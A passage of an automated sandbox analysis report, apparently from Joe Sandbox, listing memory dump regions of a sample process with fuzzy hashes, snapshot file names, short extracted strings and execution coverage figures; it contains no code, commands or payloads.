                                                                                    • Opcode Fuzzy Hash: 68ba5c307d6436fc17f031219f76c4363eabc07b4162897e087ab66d84270189
                                                                                    • Instruction Fuzzy Hash: 33914F34E106198BDF61DF68C840B9EB7B1FF89310F208599E549BB395DB70AA85CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 98114e349571c21e4ed2a4f42a5387d2d0c9b81505aeff40d39748c2c07597de
                                                                                    • Instruction ID: 4720bbcd241c1b27a95ea6604142d63e2b56ed6816af67b66d0dce619155770d
                                                                                    • Opcode Fuzzy Hash: 98114e349571c21e4ed2a4f42a5387d2d0c9b81505aeff40d39748c2c07597de
                                                                                    • Instruction Fuzzy Hash: FA713A30A106499FDB55DFA9D980A9EBBF6FF84300F24846AE505EB365DB30ED42CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c2b4ee19351f01c49752fcfc48bf8a54bba2d3315f2eeaa4496f10258ddfb0f0
                                                                                    • Instruction ID: 333d46df17c7e50eb8c0a6fc53695ce5a27e12abc680344740789372ce7d9729
                                                                                    • Opcode Fuzzy Hash: c2b4ee19351f01c49752fcfc48bf8a54bba2d3315f2eeaa4496f10258ddfb0f0
                                                                                    • Instruction Fuzzy Hash: B8713970A106099FDB55DFA9D980A9EBBF6FF84300F24846AE505EB365DB30ED42CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f8018e978a6b7f4774a62f5855a38a314205eeb20d2ab00095daf5412fd65e4
                                                                                    • Instruction ID: f0219f9a2c3f42fc3da31d4b521cb9a8626c6c0a9c436ece83860d8d9b098dbd
                                                                                    • Opcode Fuzzy Hash: 2f8018e978a6b7f4774a62f5855a38a314205eeb20d2ab00095daf5412fd65e4
                                                                                    • Instruction Fuzzy Hash: F251D531E10105DFCF95EFB8E5846AEB7B2EF85315F10886AE206DB351DB319859C790
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 57a5452f0ff8f3bbf07c6ff1a9151bc4e0d34b71b18c32c7d179ace48a206a12
                                                                                    • Instruction ID: bc9a1c4ab5bd2dde84bf720cb45cbed21483714e1102b41c5fe4ba4ec5bb6000
                                                                                    • Opcode Fuzzy Hash: 57a5452f0ff8f3bbf07c6ff1a9151bc4e0d34b71b18c32c7d179ace48a206a12
                                                                                    • Instruction Fuzzy Hash: C1510B74B306144BEFA2676CD854B2F365AE789310F60442BE70AD73D9CB79CC854392
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a980ced6cbc04005797af2a1d119a345509b13bf8d0c12a2e1aa9d915ea0e19
                                                                                    • Instruction ID: 766e26b205c761fc720b965d7489ccb190ec8857b761f5a6f2ecd93d50c2e0d3
                                                                                    • Opcode Fuzzy Hash: 3a980ced6cbc04005797af2a1d119a345509b13bf8d0c12a2e1aa9d915ea0e19
                                                                                    • Instruction Fuzzy Hash: EE510B74B306144BEFA2676CD85476F365AE789310F60442BE70AD73D9CB79CC854392
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3eaada718b84117cfacf896d6b5f7d602395958d4b0add71b77d594594e47944
                                                                                    • Instruction ID: e3a3bc2b42ffcd6b2dd312399780f28a42a46ed1fd75cf8480e178fc0053d905
                                                                                    • Opcode Fuzzy Hash: 3eaada718b84117cfacf896d6b5f7d602395958d4b0add71b77d594594e47944
                                                                                    • Instruction Fuzzy Hash: 51419D72E106098FDB75CFA9D881AAFFBF2FB94310F10492AE256D7640D330E8558B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f6dee32951543e9b6454b51d03e88ba090399774ad3e14af074128573d3fafa6
                                                                                    • Instruction ID: b979022963fd1087c159b7e8cae26b0c85021ead2ea6d617c3282bbd7f9432ec
                                                                                    • Opcode Fuzzy Hash: f6dee32951543e9b6454b51d03e88ba090399774ad3e14af074128573d3fafa6
                                                                                    • Instruction Fuzzy Hash: F331B231E206059FDB19DFA4C854A9FBBB6FF89300F108529E906EB350DB71AD41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7d577fa539e3a8007fb74b669df391e3f13a24d519eb85a81a4bbd303a02fa7d
                                                                                    • Instruction ID: 0a5c71db0595b61a6b5bc66d63734d8a838bf5e1aa060e9bdf0804c1b9390182
                                                                                    • Opcode Fuzzy Hash: 7d577fa539e3a8007fb74b669df391e3f13a24d519eb85a81a4bbd303a02fa7d
                                                                                    • Instruction Fuzzy Hash: 5E31A331E206059BDB49CFA4C954A9FBBF6FF88300F108529E906EB354DBB1AD41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1221a6de005c5db20cffa96e0e000e4e046f39481e06b61c8faa5ad07198fe33
                                                                                    • Instruction ID: 7498821bf746cd430bf6593807678616efd62056d97f8648846bed263e58aed4
                                                                                    • Opcode Fuzzy Hash: 1221a6de005c5db20cffa96e0e000e4e046f39481e06b61c8faa5ad07198fe33
                                                                                    • Instruction Fuzzy Hash: B521DD72E10615AFDB12CF79D840AEEBBF5AB88710F008066E905E7354E730D9418B90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8debe3254d9a296f852fa2ccd251d341a65dd5b4c34ced19ffa9b1abf36941bc
                                                                                    • Instruction ID: 84270e400d51ceb0eeb89f3177501ee8d58280850972b46ceaa5f24c918a77f0
                                                                                    • Opcode Fuzzy Hash: 8debe3254d9a296f852fa2ccd251d341a65dd5b4c34ced19ffa9b1abf36941bc
                                                                                    • Instruction Fuzzy Hash: C921AE72F106159FDB41DFB9D980AAEBBF1EB88710F148066EA05E7355E730DD018B90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4524086070.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_bdd000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5011b84d9dd6fa72598e01bd893f6ce18ae8af710d47c9d629eea833002dcb33
                                                                                    • Instruction ID: 505a508e5cfdc777ae50dc5e818921342eb0049dcdf4ac12a5712c8231740ee9
                                                                                    • Opcode Fuzzy Hash: 5011b84d9dd6fa72598e01bd893f6ce18ae8af710d47c9d629eea833002dcb33
                                                                                    • Instruction Fuzzy Hash: 49216F7550D3C49FC703CB24C9A4711BF71EB46214F28C5DBD9898B2A3D23A980ACB62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4524086070.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_bdd000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f4bc8709470a121c17369a4b2823a4fc59e28bc4476ae13425d11651b00809f
                                                                                    • Instruction ID: bb96c22968b0f2a45b33533ecb9acfbb5566965267bae0c2cd71d5679d742c94
                                                                                    • Opcode Fuzzy Hash: 2f4bc8709470a121c17369a4b2823a4fc59e28bc4476ae13425d11651b00809f
                                                                                    • Instruction Fuzzy Hash: 2C21F271604204DFCB15DF14D9D0B26FBA5EBC4314F24CAAED9894B396D33AD846CA62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d200c49a282fbc0d306eeb9bb3ab9e2a86f33d7c85ac5c1c26ec2289397a22c
                                                                                    • Instruction ID: ddf800b98ea70175d952f4679ffe351944380ee6b2e0f59c45abef4b9f67404f
                                                                                    • Opcode Fuzzy Hash: 0d200c49a282fbc0d306eeb9bb3ab9e2a86f33d7c85ac5c1c26ec2289397a22c
                                                                                    • Instruction Fuzzy Hash: BD112C31B181511BCB2687389450B6B7BEADB82610F1484AEF645CF396DE21DC0287D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 03a32e0084b117304d6b1885f728a79bc8825e2790777aa2cffb992ab8906b2a
                                                                                    • Instruction ID: 0e382fc8eb75b1f9b4de873e9d5e5ed62f07df7e112030312b0f760a02fecfc8
                                                                                    • Opcode Fuzzy Hash: 03a32e0084b117304d6b1885f728a79bc8825e2790777aa2cffb992ab8906b2a
                                                                                    • Instruction Fuzzy Hash: A801F1307241141FDB66867D9850B2BBBDADBC5720F11843BF60ACB742ED26DD4283D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cb9bbb57be5489efc3e04bb007172f5f11f057e8a54d09ce9bc784aff1daa4d8
                                                                                    • Instruction ID: 712981172c91fc194ce84657012fe33856f2e48afe301f3fe20bcfe778318984
                                                                                    • Opcode Fuzzy Hash: cb9bbb57be5489efc3e04bb007172f5f11f057e8a54d09ce9bc784aff1daa4d8
                                                                                    • Instruction Fuzzy Hash: FD11A532B205294FDF55AA68D8146AF73ABABC9710F00413ADA06E7354EE75DC018BD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: caa65a7bd7a493f8dda9c18d08cf21d3ba1a4d7a624667e3984955b85f2c3c61
                                                                                    • Instruction ID: 3c4d5283b05b8c228013abf49c02b8b1fab4c1e39d73ab5b52c5ab2bd79b7e90
                                                                                    • Opcode Fuzzy Hash: caa65a7bd7a493f8dda9c18d08cf21d3ba1a4d7a624667e3984955b85f2c3c61
                                                                                    • Instruction Fuzzy Hash: 5401D430B245144FC752AB38D960B1B7BDADB8A720F10846AF20ECB352DE21DDC283D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8faa1130c98a5236b9738b9919bfa5f54db85a5f11795e7d69d56d658b17139e
                                                                                    • Instruction ID: ecf70edcd54de8a5276eff099df7fab3c03c3a806b220db67f8ac744241ca2f1
                                                                                    • Opcode Fuzzy Hash: 8faa1130c98a5236b9738b9919bfa5f54db85a5f11795e7d69d56d658b17139e
                                                                                    • Instruction Fuzzy Hash: 79012432B200254BDF95AA789C107AF37EFEBC9600F00403ADA06D3344EEA19C0287D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 63037219f65d44d980f82c5c5114cc47ac33dd41c094f2c397a70aa9de45b174
                                                                                    • Instruction ID: ef734ecf039e65e7d186ec7b22dbeee488c5a1497fb9e372c2e41215d0063775
                                                                                    • Opcode Fuzzy Hash: 63037219f65d44d980f82c5c5114cc47ac33dd41c094f2c397a70aa9de45b174
                                                                                    • Instruction Fuzzy Hash: B701DC31B204140BDB6596AD9450B2FB2DAEBC8720F20883AE60ACB746EE26DC4243C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 34a76bb016ae19ed5a72ac12f5046c816a93b59f20c7e616f1423b096418b1a4
                                                                                    • Instruction ID: ee0cc8226b51bbddc9524f88663ccbb667bbc2b73674a6d2130503ec84f10440
                                                                                    • Opcode Fuzzy Hash: 34a76bb016ae19ed5a72ac12f5046c816a93b59f20c7e616f1423b096418b1a4
                                                                                    • Instruction Fuzzy Hash: 5001AF35B204111BCB66966CA460B2F63DBDBC9B21F10C83AF30ACB354EE21DC0247C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fbdd000574778d7874c4037243745d4350425525455eb336d37f494a1ac39a04
                                                                                    • Instruction ID: 8f705b3e5f423c44336f91e9c1adffb659acbe06ab9a0c9a4aebc566a78d4575
                                                                                    • Opcode Fuzzy Hash: fbdd000574778d7874c4037243745d4350425525455eb336d37f494a1ac39a04
                                                                                    • Instruction Fuzzy Hash: 43018130B205148BCB56EA6CD850B1F73DAEB89720F108829E60ECB344DE31ED8287C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c2a5cc19f4bb62c74a843514748108be4e6c1e6fb4f8590c1bd084c89a92c60
                                                                                    • Instruction ID: 340cec2c9400be07978a1a906c423a16e3b5046082c84e58030d956123f490e9
                                                                                    • Opcode Fuzzy Hash: 2c2a5cc19f4bb62c74a843514748108be4e6c1e6fb4f8590c1bd084c89a92c60
                                                                                    • Instruction Fuzzy Hash: 21F09270929289AFDF62CF70890575B7BBDEB42208F2149AAD544D7242E276CE018B91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                    • API String ID: 0-2049195972
                                                                                    • Opcode ID: 3584ca956d5887b88552e46e5bfb171a02291a84e3ef847398ce14871b6e4b4a
                                                                                    • Instruction ID: bb5e9a1d5c921a07ec7622ae62aa3bab44992ab19cf90f11e9ceb886276071a3
                                                                                    • Opcode Fuzzy Hash: 3584ca956d5887b88552e46e5bfb171a02291a84e3ef847398ce14871b6e4b4a
                                                                                    • Instruction Fuzzy Hash: DC124C30E10619CFDB65DF65D984AAEB7B2FF88300F6085AAD509AB355DB349D81CF80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0oHp$DqHp$PHeq
                                                                                    • API String ID: 0-4229592003
                                                                                    • Opcode ID: ded5719e3b7bb0c57e7e161165302351e698f9a182a2ea64901134449c21d55b
                                                                                    • Instruction ID: 16592b17e8eca7ed6422d2e351f5b08d8e63b7227a0a9b4377c471627574407c
                                                                                    • Opcode Fuzzy Hash: ded5719e3b7bb0c57e7e161165302351e698f9a182a2ea64901134449c21d55b
                                                                                    • Instruction Fuzzy Hash: 6C22B130B202049FDB55DB68D484B6EB7E2FF84311F24896AE506DB3A6DB31EC41CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \V9n$g $g
                                                                                    • API String ID: 0-2967446072
                                                                                    • Opcode ID: 638132f5eec6420f71852263265b5abbf977902c69c824f5e8c41da1606a7bc1
                                                                                    • Instruction ID: d217ac3683d42cf468cab5474703e93630e48d39a7fefd61cd2ca90ab4b45fc7
                                                                                    • Opcode Fuzzy Hash: 638132f5eec6420f71852263265b5abbf977902c69c824f5e8c41da1606a7bc1
                                                                                    • Instruction Fuzzy Hash: 6EB14EB0E002199FDF14CFA9C8857ADBBF2BF88318F14D129E819B7294EB749845DB51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XPjq$\Ojq
                                                                                    • API String ID: 0-3813800045
                                                                                    • Opcode ID: a5a2a3864a3242df884b652852d8bb1d40f3e2eb86e3742e1ae8dcd196d4784f
                                                                                    • Instruction ID: e2fffa23d161e8366bd897089ad9da32fbd6a5fc03bd7c700432915b7e8e739a
                                                                                    • Opcode Fuzzy Hash: a5a2a3864a3242df884b652852d8bb1d40f3e2eb86e3742e1ae8dcd196d4784f
                                                                                    • Instruction Fuzzy Hash: 6DE1F331B201148FDB55DB68D484BAEBBF2FB89310F25846BE646DB352CA71DC41CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1696cd687622e59a75ca7b43bb1496638a8c291ad00792e2937f80fbaf8d9a50
                                                                                    • Instruction ID: 8e9a28ced506da70aac5806c9912d816faba440d39e1eac29a76712bdd0adf66
                                                                                    • Opcode Fuzzy Hash: 1696cd687622e59a75ca7b43bb1496638a8c291ad00792e2937f80fbaf8d9a50
                                                                                    • Instruction Fuzzy Hash: 9523FA31D20A198EDB11EF68C89099DF7B1FF99300F15D69AE558B7221EB70AAC4CF41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                    • API String ID: 0-1110479544
                                                                                    • Opcode ID: d80a35ee65707314551fc24874fbdbaeaa0fe2bea1ea01de7f06709fc6d46cb3
                                                                                    • Instruction ID: 8a947f387a84c5ef4f763f45564652d3885c98d0d4a6a1593a9316a81aa1d9c7
                                                                                    • Opcode Fuzzy Hash: d80a35ee65707314551fc24874fbdbaeaa0fe2bea1ea01de7f06709fc6d46cb3
                                                                                    • Instruction Fuzzy Hash: 3C918F30A20209DFEBA5DF65D994B6F7BF2EF84300F10852AE60997395DB749D81CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .5}q$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                    • API String ID: 0-1622854337
                                                                                    • Opcode ID: 993ba031d91eeee903cc64bdf2c67f832f9ece6bba7b2f7c822948eabb5854b3
                                                                                    • Instruction ID: 50d0182ea9315bcc10450f7c4c1608b1b95711eb71c5c6fbb8336b951150670d
                                                                                    • Opcode Fuzzy Hash: 993ba031d91eeee903cc64bdf2c67f832f9ece6bba7b2f7c822948eabb5854b3
                                                                                    • Instruction Fuzzy Hash: 32F15130B20609CFDB55EF65D594A6EB7B2FF84300F649469E5159B3AACB34EC42CB80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $eq$$eq$$eq$$eq
                                                                                    • API String ID: 0-812946093
                                                                                    • Opcode ID: c014cd15f852eba6b9e398f4018f97d161206102ae0c5fe08b2307397a956f6a
                                                                                    • Instruction ID: 6adf536920b1a99065c2cb362beb1d3559201a4db44c5f2acb648aa7c0d62765
                                                                                    • Opcode Fuzzy Hash: c014cd15f852eba6b9e398f4018f97d161206102ae0c5fe08b2307397a956f6a
                                                                                    • Instruction Fuzzy Hash: 3EB13930A20208CFDB55EB65D99479EB7F2EF84300F64C46AE506AB395DB74DD82CB80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LReq$LReq$$eq$$eq
                                                                                    • API String ID: 0-731573373
                                                                                    • Opcode ID: 14d20c9f39ac02f2b2aa12249301169ed542a9c6692c6752105883699c5daf75
                                                                                    • Instruction ID: 50029d3a4c79e0e7b66ee0f6306578dbf5feabfdf90647d90310b8a96e4065d5
                                                                                    • Opcode Fuzzy Hash: 14d20c9f39ac02f2b2aa12249301169ed542a9c6692c6752105883699c5daf75
                                                                                    • Instruction Fuzzy Hash: 66518130B206059FDB55DB28D990A6A77F2FF84300F1485AAE5169F3A9DB30EC41CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $eq$$eq$$eq$$eq
                                                                                    • API String ID: 0-812946093
                                                                                    • Opcode ID: 1ffe0bfef4f9aa02687ab5a83a1e35076b9fd7bfbd4c5adc86bbdb320314eec3
                                                                                    • Instruction ID: 7c5fabcc13c61b3995cccc317ed8547c4b49c0c39b9d455ca6e659275ef36747
                                                                                    • Opcode Fuzzy Hash: 1ffe0bfef4f9aa02687ab5a83a1e35076b9fd7bfbd4c5adc86bbdb320314eec3
                                                                                    • Instruction Fuzzy Hash: 6A518E30E20205CFDBA6DB64D4806AEB7B7EF85311F14856AE909EB356DB319C81CB91

                                                                                    Execution Graph

                                                                                    Execution Coverage:19.4%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:42
                                                                                    Total number of Limit Nodes:4
